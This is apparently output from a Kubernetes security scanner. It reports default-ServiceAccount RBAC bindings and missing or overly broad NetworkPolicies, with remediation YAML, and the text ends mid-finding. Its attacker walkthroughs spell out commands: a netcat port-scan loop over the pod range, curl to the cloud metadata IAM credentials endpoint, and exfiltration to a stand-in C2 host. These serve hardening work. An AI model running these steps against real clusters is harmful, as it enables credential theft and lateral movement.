This is one of the most common privilege-escalation gateways in Kubernetes for two reasons: (1) the default SA is the *implicit* identity for every misconfigured manifest, so a single binding to it propagates to every team in the namespace; (2) developers iterating on a deployment regularly forget to set serviceAccountName and never notice the elevated identity because the API behaves as expected. The Kubernetes RBAC good-practices guide is explicit: "Avoid granting RBAC to the default service account in any namespace," precisely because it converts "forgetting a field" into "granting privilege."

The right model is to leave the default SA permissionless and require every workload to declare its identity explicitly. That turns the implicit default into a fail-closed signal that something is misconfigured.

Impact Any Pod in vulnerable that omits serviceAccountName quietly mounts a token for these RBAC rules. Compromise of any such pod (RCE in any app) yields immediate API access at the granted privileges. Workloads attached: Pod/vulnerable/generic-hostpath-app-68d6b85955-8z24r, Pod/vulnerable/host-ns-app-7cb46d5788-8xp2h, Pod/vulnerable/risky-app-5879fbc5d8-7w424, Pod/vulnerable/root-runner-5db6f7b4bf-8lwsg, Pod/vulnerable/socket-mounts-app-78c5564768-vs8kq, Deployment/vulnerable/generic-hostpath-app, Deployment/vulnerable/host-ns-app, Deployment/vulnerable/risky-app, Deployment/vulnerable/root-runner, Deployment/vulnerable/socket-mounts-app.
How an attacker abuses this
Background
Subject: ServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker exploits a workload in vulnerable that did not set spec.serviceAccountName (a common omission).
  2. They read /var/run/secrets/kubernetes.io/serviceaccount/token from the pod filesystem.
  3. They curl the kube-apiserver with the token's bearer header. The granted RBAC applies, even though the developer never knew the SA had any permissions.
  4. They use the granted rights (typical patterns: list secrets in the namespace, list pods cluster-wide, exec into other pods) to extend reach.
  5. Because the binding is to default rather than a named SA, future pods in vulnerable *also* inherit this identity. Every redeploy of every workload in the namespace becomes a potential privesc point.
Remediation
Remove all RoleBindings/ClusterRoleBindings to vulnerable/default, create dedicated ServiceAccounts per workload, and set automountServiceAccountToken: false on the default SA.
  1. List the bindings: kubectl get rolebindings,clusterrolebindings -A -o json | jq '.items[] | select(.subjects[]? | .kind == "ServiceAccount" and .name == "default" and .namespace == "vulnerable")'.
  2. For each binding, identify the workloads that actually need the right and create a dedicated SA for them (kubectl create sa <workload>-sa -n <ns>); rebind to the dedicated SA.
  3. Delete the bindings to default once consumers are migrated.
  4. Patch the default SA to disable token automounting: kubectl patch sa default -n vulnerable -p '{"automountServiceAccountToken": false}' (a declarative equivalent is sketched after this list). Combined with the next step, any pod that forgets serviceAccountName will fail closed instead of inheriting tokens.
  5. Wire enforcement: a Kyverno policy that warns/denies any new RoleBinding whose subjects contain default SA, and any Pod missing an explicit serviceAccountName.
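The declarative equivalent of step 4, suitable for keeping in the namespace's manifests instead of a one-off patch:
apiVersion: v1
kind: ServiceAccount
metadata:
  name: default
  namespace: vulnerable
automountServiceAccountToken: false
Workloads that genuinely need API access then opt in explicitly with a dedicated serviceAccountName (and automountServiceAccountToken: true at the pod level if required), so a forgotten field fails closed rather than inheriting this binding.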
Evidence
Effective rules
get on configmaps
via cm-reader (binding default-sa-rb) in namespace vulnerable
Workloads
Pod/generic-hostpath-app-68d6b85955-8z24r in namespace vulnerable
Pod/host-ns-app-7cb46d5788-8xp2h in namespace vulnerable
Pod/risky-app-5879fbc5d8-7w424 in namespace vulnerable
Pod/root-runner-5db6f7b4bf-8lwsg in namespace vulnerable
Pod/socket-mounts-app-78c5564768-vs8kq in namespace vulnerable
Deployment/generic-hostpath-app in namespace vulnerable
Deployment/host-ns-app in namespace vulnerable
Deployment/risky-app in namespace vulnerable
Deployment/root-runner in namespace vulnerable
Deployment/socket-mounts-app in namespace vulnerable
Show raw JSON
{
  "rules": [
    {
      "namespace": "vulnerable",
      "resources": [
        "configmaps"
      ],
      "source_binding": "default-sa-rb",
      "source_role": "cm-reader",
      "verbs": [
        "get"
      ]
    }
  ],
  "workloads": [
    {
      "kind": "Pod",
      "name": "generic-hostpath-app-68d6b85955-8z24r",
      "namespace": "vulnerable"
    },
    {
      "kind": "Pod",
      "name": "host-ns-app-7cb46d5788-8xp2h",
      "namespace": "vulnerable"
    },
    {
      "kind": "Pod",
      "name": "risky-app-5879fbc5d8-7w424",
      "namespace": "vulnerable"
    },
    {
      "kind": "Pod",
      "name": "root-runner-5db6f7b4bf-8lwsg",
      "namespace": "vulnerable"
    },
    {
      "kind": "Pod",
      "name": "socket-mounts-app-78c5564768-vs8kq",
      "namespace": "vulnerable"
    },
    {
      "kind": "Deployment",
      "name": "generic-hostpath-app",
      "namespace": "vulnerable"
    },
    {
      "kind": "Deployment",
      "name": "host-ns-app",
      "namespace": "vulnerable"
    },
    {
      "kind": "Deployment",
      "name": "risky-app",
      "namespace": "vulnerable"
    },
    {
      "kind": "Deployment",
      "name": "root-runner",
      "namespace": "vulnerable"
    },
    {
      "kind": "Deployment",
      "name": "socket-mounts-app",
      "namespace": "vulnerable"
    }
  ]
}

Network Policy

10 findings · 5 rules · 0 critical · 7 high · 3 medium · 0 low
HIGH

NetworkPolicy flat-network/allow-broad allows egress to 0.0.0.0/0 (entire internet)

KUBE-NETPOL-WEAKNESS-002 1 subject Score 7.6

Affected subject

HIGH NetworkPolicy/flat-network/allow-broad Object 7.6
NetworkPolicy flat-network/allow-broad allows egress to 0.0.0.0/0 (entire internet)
Scope · Object NetworkPolicy flat-network/allow-broad: the workloads it selects can reach any IPv4/IPv6 destination
Category: Lateral Movement Resource: NetworkPolicy/flat-network/allow-broad Namespace: flat-network

NetworkPolicy flat-network/allow-broad contains an egress rule whose ipBlock.cidr is 0.0.0.0/0. This is the broadest possible CIDR, semantically equivalent to "allow this workload to make outbound connections to any destination." Because NetworkPolicy egress rules are additive, this single rule defeats whatever segmentation other policies tried to build for the selected pods.

Two properties make this rule especially dangerous: (1) 0.0.0.0/0 includes the link-local range that holds the cloud Instance Metadata Service (169.254.169.254/32 on AWS/Azure, metadata.google.internal on GCP), so a compromised pod can scrape node IAM credentials and pivot to the underlying cloud account; (2) 0.0.0.0/0 also includes the Pod and Service CIDRs of the cluster itself, so the rule does not just open the internet. It also opens inter-namespace traffic for the selected pods unless an except: block carves out the cluster ranges.

A correctly-scoped egress policy uses an ipBlock with the specific CIDRs the workload needs (a private VPC peer, a known SaaS provider's published range), or a namespaceSelector + podSelector pair to a named in-cluster dependency. 0.0.0.0/0 should never appear in a production egress allow rule.

Impact Selected workload can reach any IP, including cloud IMDS (credential theft) and arbitrary attacker C2 (data exfiltration). This turns any pod compromise into cloud-account compromise.
How an attacker abuses this
  1. Attacker compromises a pod selected by allow-broad.spec.podSelector.
  2. They hit http://169.254.169.254/latest/meta-data/iam/security-credentials/ and pull the node's IAM credentials. The egress rule allows this because IMDS is inside 0.0.0.0/0.
  3. They use stolen IAM credentials with aws sts get-caller-identity then enumerate the cloud account.
  4. They open an outbound TLS connection to c2.attacker.example on 443 (covered by the same broad rule) and exfiltrate harvested secrets.
  5. They abuse the same broad CIDR to reach other in-cluster Services unless except: carves out the cluster ranges.
Remediation
Replace 0.0.0.0/0 with the specific CIDRs the workload needs, or use namespaceSelector/podSelector for in-cluster destinations, and explicitly carve out the IMDS range.
  1. Inventory what allow-broad's selected pods actually need to reach (use kubectl exec ... -- ss -tnp or VPC flow logs).
  2. Replace the 0.0.0.0/0 rule with a specific allowlist: ipBlocks for required SaaS CIDRs, namespaceSelector/podSelector for in-cluster targets (see the sketch after this list).
  3. At a CNI tier (Calico GlobalNetworkPolicy or Cilium ClusterwideNetworkPolicy), add a non-overridable deny for 169.254.169.254/32.
  4. Validate with a netshoot pod: confirm legitimate destinations resolve and connect; confirm curl --max-time 3 http://169.254.169.254/ and arbitrary internet hosts time out.
  5. Add a Kyverno or OPA Gatekeeper policy that rejects any new NetworkPolicy whose ipBlock CIDR is 0.0.0.0/0 or ::/0.
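A sketch of the step 2 replacement. The CIDR, namespace label, and ports are placeholders for whatever the traffic review in step 1 actually shows the selected workloads need; reuse allow-broad's original podSelector in practice.
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-scoped-egress              # hypothetical replacement for allow-broad
  namespace: flat-network
spec:
  podSelector: {}                        # placeholder: copy allow-broad's podSelector here
  policyTypes:
    - Egress
  egress:
    - to:
        - ipBlock:
            cidr: 203.0.113.0/24         # placeholder: the external range the workload actually needs
      ports:
        - protocol: TCP
          port: 443
    - to:
        - namespaceSelector:
            matchLabels:
              kubernetes.io/metadata.name: backend   # placeholder in-cluster dependency
      ports:
        - protocol: TCP
          port: 5432
Because nothing here allows 169.254.169.254, IMDS access is denied by omission; the CNI-tier deny in step 3 keeps it blocked even if a broader rule is added later.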
Evidence
Policy: allow-broad
CIDR: 0.0.0.0/0
Entire IPv4 internet: egress here can exfiltrate to any host
Show raw JSON
{
  "cidr": "0.0.0.0/0",
  "policy": "allow-broad"
}
HIGH

Namespace default has zero NetworkPolicies, so all pods accept any inbound and reach any outbound endpoint

KUBE-NETPOL-COVERAGE-001 6 subjects Score 7.4

Affected subjects (6)

HIGH Namespace/default/default Namespace 7.4
Namespace default has zero NetworkPolicies, so all pods accept any inbound and reach any outbound endpoint
Scope · Namespace Namespace default: every workload inside inherits allow-all behavior
Category: Lateral Movement Resource: Namespace/default/default Namespace: default

Namespace default contains workloads but no NetworkPolicy objects. Without any policy selecting its pods, the Kubernetes networking model is allow-all in both directions: any pod in any namespace can open a TCP/UDP connection to any pod here, and any pod here can open arbitrary outbound connections (cluster pod CIDR, Services, node IPs, the cloud Instance Metadata Service at 169.254.169.254, the public internet, and the API server).

This is the documented Kubernetes default. A pod is non-isolated for ingress/egress until at least one NetworkPolicy with the relevant policyTypes selects it. CIS Kubernetes Benchmark 5.3.2 and the NSA/CISA Hardening Guide v1.2 both require a default-deny baseline in every namespace.

A single compromised pod (RCE, leaked credential, supply-chain backdoor) immediately gains the full L3/L4 reachability graph of the cluster: kube-DNS for service discovery, the cloud metadata service for IAM credentials, attacker-controlled C2 endpoints, and high-value pods (databases, vault, kube-system DaemonSets) all without crossing any policy boundary.

Impact Any pod compromise becomes cluster-wide L3/L4 reach: lateral movement, credential theft from IMDS, and arbitrary egress to attacker C2 are all unblocked.
How an attacker abuses this
Background
Resource: Namespace

A Namespace divides cluster resources by team, environment, or application. RoleBindings, NetworkPolicies, ResourceQuotas, and most admission rules apply at namespace scope. Compromising one workload in a namespace often gives lateral access to the rest of that namespace's resources.

  1. Attacker exploits an unpatched dependency in any pod in default and lands a shell.
  2. They scan the pod CIDR (for i in $(seq 1 254); do nc -zv 10.244.0.$i 6379 5432 3306 27017; done). Every database port across every namespace is reachable.
  3. They hit the cloud metadata endpoint curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ and exfiltrate the node's IAM credentials.
  4. They establish outbound C2 to attacker-controlled IP/domain over 443 and tunnel harvested secrets, pod tokens, and DNS reconnaissance.
  5. They pivot cluster-wide: query kube-DNS for *.svc.cluster.local, identify Vault/Postgres/Redis, and authenticate with stolen tokens. Full lateral movement.
Remediation
Apply a default-deny-all NetworkPolicy in default, then add minimal explicit allow policies for DNS plus each workload's actual ingress/egress dependencies.
  1. Apply a default-deny baseline (podSelector: {}, policyTypes: [Ingress, Egress]) to default (this and the DNS policy from step 2 are sketched after this list).
  2. Add a tightly-scoped DNS allow policy (UDP/TCP 53 to kube-system). Without DNS every workload's hostname resolution will fail.
  3. For each workload, write an explicit allow policy: ingress from the named upstream and egress to its actual dependencies. Never 0.0.0.0/0.
  4. Validate with a debug pod: kubectl run -n default --rm -it tmp --image=nicolaka/netshoot -- bash confirming allowed paths work and disallowed paths time out.
  5. Wire CIS 5.3.2 / Kyverno's require-network-policy policy into CI so future namespaces ship with a baseline.
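Steps 1 and 2 together are two small objects; the same pair, with only the namespace changed, also covers the other unprotected namespaces reported below.
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-all
  namespace: default
spec:
  podSelector: {}              # selects every pod in the namespace
  policyTypes:
    - Ingress
    - Egress
---
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-dns
  namespace: default
spec:
  podSelector: {}
  policyTypes:
    - Egress
  egress:
    - to:
        - namespaceSelector:
            matchLabels:
              kubernetes.io/metadata.name: kube-system
      ports:
        - protocol: UDP
          port: 53
        - protocol: TCP
          port: 53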
Evidence
Namespace: default
Show raw JSON
{
  "namespace": "default"
}
HIGH Namespace/local-path-storage/local-path-storage Namespace 7.4
Namespace local-path-storage has zero NetworkPolicies, so all pods accept any inbound and reach any outbound endpoint
Scope · Namespace Namespace local-path-storage: every workload inside inherits allow-all behavior
Category: Lateral Movement Resource: Namespace/local-path-storage/local-path-storage Namespace: local-path-storage

Namespace local-path-storage contains workloads but no NetworkPolicy objects. Without any policy selecting its pods, the Kubernetes networking model is allow-all in both directions: any pod in any namespace can open a TCP/UDP connection to any pod here, and any pod here can open arbitrary outbound connections (cluster pod CIDR, Services, node IPs, the cloud Instance Metadata Service at 169.254.169.254, the public internet, and the API server).

This is the documented Kubernetes default. A pod is non-isolated for ingress/egress until at least one NetworkPolicy with the relevant policyTypes selects it. CIS Kubernetes Benchmark 5.3.2 and the NSA/CISA Hardening Guide v1.2 both require a default-deny baseline in every namespace.

A single compromised pod (RCE, leaked credential, supply-chain backdoor) immediately gains the full L3/L4 reachability graph of the cluster: kube-DNS for service discovery, the cloud metadata service for IAM credentials, attacker-controlled C2 endpoints, and high-value pods (databases, vault, kube-system DaemonSets) all without crossing any policy boundary.

Impact Any pod compromise becomes cluster-wide L3/L4 reach: lateral movement, credential theft from IMDS, and arbitrary egress to attacker C2 are all unblocked.
How an attacker abuses this
Background
Resource: Namespace

A Namespace divides cluster resources by team, environment, or application. RoleBindings, NetworkPolicies, ResourceQuotas, and most admission rules apply at namespace scope. Compromising one workload in a namespace often gives lateral access to the rest of that namespace's resources.

  1. Attacker exploits an unpatched dependency in any pod in local-path-storage and lands a shell.
  2. They scan the pod CIDR (for i in $(seq 1 254); do nc -zv 10.244.0.$i 6379 5432 3306 27017; done). Every database port across every namespace is reachable.
  3. They hit the cloud metadata endpoint curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ and exfiltrate the node's IAM credentials.
  4. They establish outbound C2 to attacker-controlled IP/domain over 443 and tunnel harvested secrets, pod tokens, and DNS reconnaissance.
  5. They pivot cluster-wide: query kube-DNS for *.svc.cluster.local, identify Vault/Postgres/Redis, and authenticate with stolen tokens. Full lateral movement.
Remediation
Apply a default-deny-all NetworkPolicy in local-path-storage, then add minimal explicit allow policies for DNS plus each workload's actual ingress/egress dependencies.
  1. Apply a default-deny baseline (podSelector: {}, policyTypes: [Ingress, Egress]) to local-path-storage.
  2. Add a tightly-scoped DNS allow policy (UDP/TCP 53 to kube-system). Without DNS every workload's hostname resolution will fail.
  3. For each workload, write an explicit allow policy: ingress from the named upstream and egress to its actual dependencies. Never 0.0.0.0/0.
  4. Validate with a debug pod: kubectl run -n local-path-storage --rm -it tmp --image=nicolaka/netshoot -- bash confirming allowed paths work and disallowed paths time out.
  5. Wire CIS 5.3.2 / Kyverno's require-network-policy policy into CI so future namespaces ship with a baseline.
Evidence
Namespace: local-path-storage
Show raw JSON
{
  "namespace": "local-path-storage"
}
HIGH Namespace/psa-suppressed/psa-suppressed Namespace 7.4
Namespace psa-suppressed has zero NetworkPolicies, so all pods accept any inbound and reach any outbound endpoint
Scope · Namespace Namespace psa-suppressed: every workload inside inherits allow-all behavior
Category: Lateral Movement Resource: Namespace/psa-suppressed/psa-suppressed Namespace: psa-suppressed

Namespace psa-suppressed contains workloads but no NetworkPolicy objects. Without any policy selecting its pods, the Kubernetes networking model is allow-all in both directions: any pod in any namespace can open a TCP/UDP connection to any pod here, and any pod here can open arbitrary outbound connections (cluster pod CIDR, Services, node IPs, the cloud Instance Metadata Service at 169.254.169.254, the public internet, and the API server).

This is the documented Kubernetes default. A pod is non-isolated for ingress/egress until at least one NetworkPolicy with the relevant policyTypes selects it. CIS Kubernetes Benchmark 5.3.2 and the NSA/CISA Hardening Guide v1.2 both require a default-deny baseline in every namespace.

A single compromised pod (RCE, leaked credential, supply-chain backdoor) immediately gains the full L3/L4 reachability graph of the cluster: kube-DNS for service discovery, the cloud metadata service for IAM credentials, attacker-controlled C2 endpoints, and high-value pods (databases, vault, kube-system DaemonSets) all without crossing any policy boundary.

Impact Any pod compromise becomes cluster-wide L3/L4 reach: lateral movement, credential theft from IMDS, and arbitrary egress to attacker C2 are all unblocked.
How an attacker abuses this
Background
Resource: Namespace

A Namespace divides cluster resources by team, environment, or application. RoleBindings, NetworkPolicies, ResourceQuotas, and most admission rules apply at namespace scope. Compromising one workload in a namespace often gives lateral access to the rest of that namespace's resources.

  1. Attacker exploits an unpatched dependency in any pod in psa-suppressed and lands a shell.
  2. They scan the pod CIDR (for i in $(seq 1 254); do nc -zv 10.244.0.$i 6379 5432 3306 27017; done). Every database port across every namespace is reachable.
  3. They hit the cloud metadata endpoint curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ and exfiltrate the node's IAM credentials.
  4. They establish outbound C2 to attacker-controlled IP/domain over 443 and tunnel harvested secrets, pod tokens, and DNS reconnaissance.
  5. They pivot cluster-wide: query kube-DNS for *.svc.cluster.local, identify Vault/Postgres/Redis, and authenticate with stolen tokens. Full lateral movement.
Remediation
Apply a default-deny-all NetworkPolicy in psa-suppressed, then add minimal explicit allow policies for DNS plus each workload's actual ingress/egress dependencies.
  1. Apply a default-deny baseline (podSelector: {}, policyTypes: [Ingress, Egress]) to psa-suppressed.
  2. Add a tightly-scoped DNS allow policy (UDP/TCP 53 to kube-system). Without DNS every workload's hostname resolution will fail.
  3. For each workload, write an explicit allow policy: ingress from the named upstream and egress to its actual dependencies. Never 0.0.0.0/0.
  4. Validate with a debug pod: kubectl run -n psa-suppressed --rm -it tmp --image=nicolaka/netshoot -- bash confirming allowed paths work and disallowed paths time out.
  5. Wire CIS 5.3.2 / Kyverno's require-network-policy policy into CI so future namespaces ship with a baseline.
Evidence
Namespace: psa-suppressed
Show raw JSON
{
  "namespace": "psa-suppressed"
}
HIGH Namespace/rbac-fixtures/rbac-fixtures Namespace 7.4
Namespace rbac-fixtures has zero NetworkPolicies, so all pods accept any inbound and reach any outbound endpoint
Scope · Namespace Namespace rbac-fixtures: every workload inside inherits allow-all behavior
Category: Lateral Movement Resource: Namespace/rbac-fixtures/rbac-fixtures Namespace: rbac-fixtures

Namespace rbac-fixtures contains workloads but no NetworkPolicy objects. Without any policy selecting its pods, the Kubernetes networking model is allow-all in both directions: any pod in any namespace can open a TCP/UDP connection to any pod here, and any pod here can open arbitrary outbound connections (cluster pod CIDR, Services, node IPs, the cloud Instance Metadata Service at 169.254.169.254, the public internet, and the API server).

This is the documented Kubernetes default. A pod is non-isolated for ingress/egress until at least one NetworkPolicy with the relevant policyTypes selects it. CIS Kubernetes Benchmark 5.3.2 and the NSA/CISA Hardening Guide v1.2 both require a default-deny baseline in every namespace.

A single compromised pod (RCE, leaked credential, supply-chain backdoor) immediately gains the full L3/L4 reachability graph of the cluster: kube-DNS for service discovery, the cloud metadata service for IAM credentials, attacker-controlled C2 endpoints, and high-value pods (databases, vault, kube-system DaemonSets) all without crossing any policy boundary.

Impact Any pod compromise becomes cluster-wide L3/L4 reach: lateral movement, credential theft from IMDS, and arbitrary egress to attacker C2 are all unblocked.
How an attacker abuses this
Background
ResourceNamespace

A Namespace divides cluster resources by team, environment, or application. RoleBindings, NetworkPolicies, ResourceQuotas, and most admission rules apply at namespace scope. Compromising one workload in a namespace often gives lateral access to the rest of that namespace's resources.

  1. Attacker exploits an unpatched dependency in any pod in rbac-fixtures and lands a shell.
  2. They scan the pod CIDR (for i in $(seq 1 254); do nc -zv 10.244.0.$i 6379 5432 3306 27017; done). Every database port across every namespace is reachable.
  3. They hit the cloud metadata endpoint curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ and exfiltrate the node's IAM credentials.
  4. They establish outbound C2 to attacker-controlled IP/domain over 443 and tunnel harvested secrets, pod tokens, and DNS reconnaissance.
  5. They pivot cluster-wide: query kube-DNS for *.svc.cluster.local, identify Vault/Postgres/Redis, and authenticate with stolen tokens. Full lateral movement.
Remediation
Apply a default-deny-all NetworkPolicy in rbac-fixtures, then add minimal explicit allow policies for DNS plus each workload's actual ingress/egress dependencies.
  1. Apply a default-deny baseline (podSelector: {}, policyTypes: [Ingress, Egress]) to rbac-fixtures.
  2. Add a tightly-scoped DNS allow policy (UDP/TCP 53 to kube-system). Without DNS every workload's hostname resolution will fail.
  3. For each workload, write an explicit allow policy: ingress from the named upstream and egress to its actual dependencies. Never 0.0.0.0/0.
  4. Validate with a debug pod: kubectl run -n rbac-fixtures --rm -it tmp --image=nicolaka/netshoot -- bash confirming allowed paths work and disallowed paths time out.
  5. Wire CIS 5.3.2 / Kyverno's require-network-policy policy into CI so future namespaces ship with a baseline.
Evidence
Namespace: rbac-fixtures
Show raw JSON
{
  "namespace": "rbac-fixtures"
}
HIGH Namespace/rbac-ns-fixtures/rbac-ns-fixtures Namespace 7.4
Namespace rbac-ns-fixtures has zero NetworkPolicies, so all pods accept any inbound and reach any outbound endpoint
Scope · Namespace Namespace rbac-ns-fixtures: every workload inside inherits allow-all behavior
Category: Lateral Movement Resource: Namespace/rbac-ns-fixtures/rbac-ns-fixtures Namespace: rbac-ns-fixtures

Namespace rbac-ns-fixtures contains workloads but no NetworkPolicy objects. Without any policy selecting its pods, the Kubernetes networking model is allow-all in both directions: any pod in any namespace can open a TCP/UDP connection to any pod here, and any pod here can open arbitrary outbound connections (cluster pod CIDR, Services, node IPs, the cloud Instance Metadata Service at 169.254.169.254, the public internet, and the API server).

This is the documented Kubernetes default. A pod is non-isolated for ingress/egress until at least one NetworkPolicy with the relevant policyTypes selects it. CIS Kubernetes Benchmark 5.3.2 and the NSA/CISA Hardening Guide v1.2 both require a default-deny baseline in every namespace.

A single compromised pod (RCE, leaked credential, supply-chain backdoor) immediately gains the full L3/L4 reachability graph of the cluster: kube-DNS for service discovery, the cloud metadata service for IAM credentials, attacker-controlled C2 endpoints, and high-value pods (databases, vault, kube-system DaemonSets) all without crossing any policy boundary.

Impact Any pod compromise becomes cluster-wide L3/L4 reach: lateral movement, credential theft from IMDS, and arbitrary egress to attacker C2 are all unblocked.
How an attacker abuses this
Background
ResourceNamespace

A Namespace divides cluster resources by team, environment, or application. RoleBindings, NetworkPolicies, ResourceQuotas, and most admission rules apply at namespace scope. Compromising one workload in a namespace often gives lateral access to the rest of that namespace's resources.

  1. Attacker exploits an unpatched dependency in any pod in rbac-ns-fixtures and lands a shell.
  2. They scan the pod CIDR (for i in $(seq 1 254); do nc -zv 10.244.0.$i 6379 5432 3306 27017; done). Every database port across every namespace is reachable.
  3. They hit the cloud metadata endpoint curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ and exfiltrate the node's IAM credentials.
  4. They establish outbound C2 to attacker-controlled IP/domain over 443 and tunnel harvested secrets, pod tokens, and DNS reconnaissance.
  5. They pivot cluster-wide: query kube-DNS for *.svc.cluster.local, identify Vault/Postgres/Redis, and authenticate with stolen tokens. Full lateral movement.
Remediation
Apply a default-deny-all NetworkPolicy in rbac-ns-fixtures, then add minimal explicit allow policies for DNS plus each workload's actual ingress/egress dependencies.
  1. Apply a default-deny baseline (podSelector: {}, policyTypes: [Ingress, Egress]) to rbac-ns-fixtures.
  2. Add a tightly-scoped DNS allow policy (UDP/TCP 53 to kube-system). Without DNS every workload's hostname resolution will fail.
  3. For each workload, write an explicit allow policy: ingress from the named upstream and egress to its actual dependencies. Never 0.0.0.0/0.
  4. Validate with a debug pod: kubectl run -n rbac-ns-fixtures --rm -it tmp --image=nicolaka/netshoot -- bash confirming allowed paths work and disallowed paths time out.
  5. Wire CIS 5.3.2 / Kyverno's require-network-policy policy into CI so future namespaces ship with a baseline.
Evidence
Namespace: rbac-ns-fixtures
Show raw JSON
{
  "namespace": "rbac-ns-fixtures"
}
HIGH Namespace/vulnerable/vulnerable Namespace 7.4
Namespace vulnerable has zero NetworkPolicies, so all pods accept any inbound and reach any outbound endpoint
Scope · Namespace Namespace vulnerable: every workload inside inherits allow-all behavior
Category: Lateral Movement Resource: Namespace/vulnerable/vulnerable Namespace: vulnerable

Namespace vulnerable contains workloads but no NetworkPolicy objects. Without any policy selecting its pods, the Kubernetes networking model is allow-all in both directions: any pod in any namespace can open a TCP/UDP connection to any pod here, and any pod here can open arbitrary outbound connections (cluster pod CIDR, Services, node IPs, the cloud Instance Metadata Service at 169.254.169.254, the public internet, and the API server).

This is the documented Kubernetes default. A pod is non-isolated for ingress/egress until at least one NetworkPolicy with the relevant policyTypes selects it. CIS Kubernetes Benchmark 5.3.2 and the NSA/CISA Hardening Guide v1.2 both require a default-deny baseline in every namespace.

A single compromised pod (RCE, leaked credential, supply-chain backdoor) immediately gains the full L3/L4 reachability graph of the cluster: kube-DNS for service discovery, the cloud metadata service for IAM credentials, attacker-controlled C2 endpoints, and high-value pods (databases, vault, kube-system DaemonSets) all without crossing any policy boundary.

Impact Any pod compromise becomes cluster-wide L3/L4 reach: lateral movement, credential theft from IMDS, and arbitrary egress to attacker C2 are all unblocked.
How an attacker abuses this
Background
ResourceNamespace

A Namespace divides cluster resources by team, environment, or application. RoleBindings, NetworkPolicies, ResourceQuotas, and most admission rules apply at namespace scope. Compromising one workload in a namespace often gives lateral access to the rest of that namespace's resources.

  1. Attacker exploits an unpatched dependency in any pod in vulnerable and lands a shell.
  2. They scan the pod CIDR (for i in $(seq 1 254); do nc -zv 10.244.0.$i 6379 5432 3306 27017; done). Every database port across every namespace is reachable.
  3. They hit the cloud metadata endpoint curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ and exfiltrate the node's IAM credentials.
  4. They establish outbound C2 to attacker-controlled IP/domain over 443 and tunnel harvested secrets, pod tokens, and DNS reconnaissance.
  5. They pivot cluster-wide: query kube-DNS for *.svc.cluster.local, identify Vault/Postgres/Redis, and authenticate with stolen tokens. Full lateral movement.
Remediation
Apply a default-deny-all NetworkPolicy in vulnerable, then add minimal explicit allow policies for DNS plus each workload's actual ingress/egress dependencies.
  1. Apply a default-deny baseline (podSelector: {}, policyTypes: [Ingress, Egress]) to vulnerable.
  2. Add a tightly-scoped DNS allow policy (UDP/TCP 53 to kube-system). Without DNS every workload's hostname resolution will fail.
  3. For each workload, write an explicit allow policy: ingress from the named upstream and egress to its actual dependencies. Never 0.0.0.0/0.
  4. Validate with a debug pod: kubectl run -n vulnerable --rm -it tmp --image=nicolaka/netshoot -- bash confirming allowed paths work and disallowed paths time out.
  5. Wire CIS 5.3.2 / Kyverno's require-network-policy policy into CI so future namespaces ship with a baseline.
Evidence
Namespace: vulnerable
Show raw JSON
{
  "namespace": "vulnerable"
}
MEDIUM

Workload Deployment/flat-network/unmatched is in a namespace with NetworkPolicies, but no policy podSelector matches it

KUBE-NETPOL-COVERAGE-002 1 subject Score 6.2

Affected subject

MEDIUM Deployment/flat-network/unmatched Workload 6.2
Workload Deployment/flat-network/unmatched is in a namespace with NetworkPolicies, but no policy podSelector matches it
Scope · Workload Workload Deployment/flat-network/unmatched (labels app=orphan): covered by no NetworkPolicy in flat-network
Category: Lateral Movement Resource: Deployment/flat-network/unmatched Namespace: flat-network

Workload Deployment/flat-network/unmatched runs in flat-network which has at least one NetworkPolicy, but none of those policies' podSelector clauses match this workload's labels (app=orphan). The Kubernetes NetworkPolicy specification is explicit: a pod is "non-isolated" for ingress/egress until a NetworkPolicy with the corresponding policyTypes entry selects it.

This is the most common misconfiguration in clusters that have started rolling out NetworkPolicies: the operator added policies for the visible apps and forgot a sidecar Job, a CronJob spawned by an operator, a debug Deployment, or a workload whose labels were renamed. "Selected by no policy" is semantically identical to "in a namespace with no policies at all" for this specific pod (full allow-in, full allow-out) even though kubectl get netpol makes the namespace look protected.

The failure mode is invisible at a glance: dashboards say "NetworkPolicies present in namespace," CIS 5.3.2 may pass, but the uncovered workload is exactly the kind of pod attackers love: operator-managed, often privileged, often forgotten.

Impact This single workload retains full allow-all ingress and egress while the rest of the namespace is segmented, making it the easiest pivot point for an attacker who lands anywhere else in the cluster.
How an attacker abuses this
Background
ResourceDeployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. Attacker compromises a low-value pod elsewhere in the cluster (CVE in a web app).
  2. They scan the namespace's pod CIDR for reachable services. Other pods in flat-network correctly drop unsolicited traffic, except unmatched, which is uncovered.
  3. They hit unmatched's exposed application port and exploit a known issue, gaining a shell.
  4. From unmatched, attacker has unrestricted egress: hits IMDS for cloud IAM credentials, opens C2 to attacker IPs, uses the pod's mounted ServiceAccount token against the API server.
  5. The attacker now has the network position the rest of the namespace's policies were designed to prevent.
Remediation
Either deploy a namespace-wide default-deny baseline in flat-network so every new pod is automatically covered, or add an explicit policy whose podSelector matches this workload's labels.
  1. Add a default-deny baseline (podSelector: {}, policyTypes: [Ingress, Egress]) in flat-network so future pods fail closed.
  2. Write an explicit allow policy whose podSelector matches unmatched's labels and lists only the ingress sources and egress destinations it needs (see the sketch after this list).
  3. Validate by re-running this scanner; the workload should now match at least one policy.
  4. Add a CI check (Kyverno's require-matching-network-policy or an OPA constraint) that fails if a new workload is admitted with labels not covered by any existing NetworkPolicy.
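A sketch of step 2 for this workload, assuming its legitimate caller runs in the same namespace with the label app: frontend on TCP 8080 (both hypothetical; substitute the real upstream and port):
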